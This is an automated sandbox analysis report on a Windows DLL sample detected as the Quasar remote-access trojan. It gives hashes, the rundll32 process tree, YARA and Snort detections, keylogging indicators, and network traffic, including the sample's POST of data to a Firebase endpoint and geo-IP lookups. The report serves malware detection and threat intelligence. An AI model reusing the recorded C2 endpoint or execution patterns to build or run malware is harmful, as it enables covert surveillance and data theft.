Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vstdlib_s64.dll.dll

Overview

General Information

Sample name:vstdlib_s64.dll.dll
renamed because original name is a hash value
Original sample name:vstdlib_s64.dll.exe
Analysis ID:1473780
MD5:ac7da10e20d625cc463536172d0ac33e
SHA1:c4242194e3faa82506513e2572c160a30082bfb0
SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
Tags:BlotchyQuasarexeRAT
Infos:

Detection

Quasar
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 3228 cmdline: loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1508 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5824 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6220 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6956 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5052 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2500 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3748 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6864 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1516 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1612 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6724 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6916 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6912 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1196 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2840 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4488 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2536 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3340 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
vstdlib_s64.dll.dllJoeSecurity_QuasarYara detected Quasar RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
              Click to see the 36 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.rundll32.exe.18eb8a10000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                10.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  11.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                    5.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                      14.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                        Click to see the 29 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:07/15/24-21:07:19.513418
                        SID:2814031
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/15/24-21:07:19.945864
                        SID:2814030
                        Source Port:49739
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: vstdlib_s64.dll.dllReversingLabs: Detection: 26%
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 10.2.rundll32.exe.18eb8a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.21a9fe10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2371efb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.17cca230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dbf6fc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.168e3950000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.1da7abe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.21ef74e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.1ab44df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1d941d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2113b830000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1d6442d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.1b080df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.20fedbb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.1edd23b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.13ffd190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.2b1acfd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR
                        Machine Learning detection for sample
                        Source: vstdlib_s64.dll.dllJoe Sandbox ML: detected
                        Source: unknownHTTPS traffic detected: 34.120.206.254:443 -> 192.168.2.4:49735 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 88.198.193.213:443 -> 192.168.2.4:49740 version: TLS 1.0
                        Source: vstdlib_s64.dll.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2814031 ETPRO TROJAN W32/Quasar RAT Connectivity Check 192.168.2.4:49738 -> 88.198.193.213:80
                        Source: TrafficSnort IDS: 2814030 ETPRO TROJAN W32/Quasar RAT Connectivity Check 2 192.168.2.4:49739 -> 3.33.130.190:80
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.12.205 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 88.198.193.213 443Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 34.120.206.254 443Jump to behavior
                        Source: global trafficHTTP traffic detected: POST /user.json HTTP/1.1Content-Type: application/json; charset=utf-8Host: argentina-e4162-default-rtdb.firebaseio.comContent-Length: 76Expect: 100-continueConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 88.198.193.213 88.198.193.213
                        Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                        Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: unknownDNS query: name: freegeoip.net
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: www.telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: www.telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: freegeoip.netConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 34.120.206.254:443 -> 192.168.2.4:49735 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 88.198.193.213:443 -> 192.168.2.4:49740 version: TLS 1.0
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: www.telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: www.telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: freegeoip.netConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: argentina-e4162-default-rtdb.firebaseio.com
                        Source: global trafficDNS traffic detected: DNS query: telize.com
                        Source: global trafficDNS traffic detected: DNS query: www.telize.com
                        Source: global trafficDNS traffic detected: DNS query: freegeoip.net
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: unknownHTTP traffic detected: POST /user.json HTTP/1.1Content-Type: application/json; charset=utf-8Host: argentina-e4162-default-rtdb.firebaseio.comContent-Length: 76Expect: 100-continueConnection: Keep-Alive
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://api.ipify.org/
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://freegeoip.net/xml/
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://telize.com/geoip
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://argentina-e4162-default-rtdb.firebaseio.com/user.json
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: vstdlib_s64.dll.dll, oqBXyy.cs.Net Code: Instal_Key_Capt
                        Source: vstdlib_s64.dll.dll, pblsOey.cs.Net Code: hook

                        E-Banking Fraud

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 10.2.rundll32.exe.18eb8a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.21a9fe10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2371efb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.17cca230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dbf6fc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.168e3950000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.1da7abe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.21ef74e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.1ab44df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1d941d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2113b830000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1d6442d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.1b080df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.20fedbb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.1edd23b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.13ffd190000.0.unpack, type: UNPACKEDPE
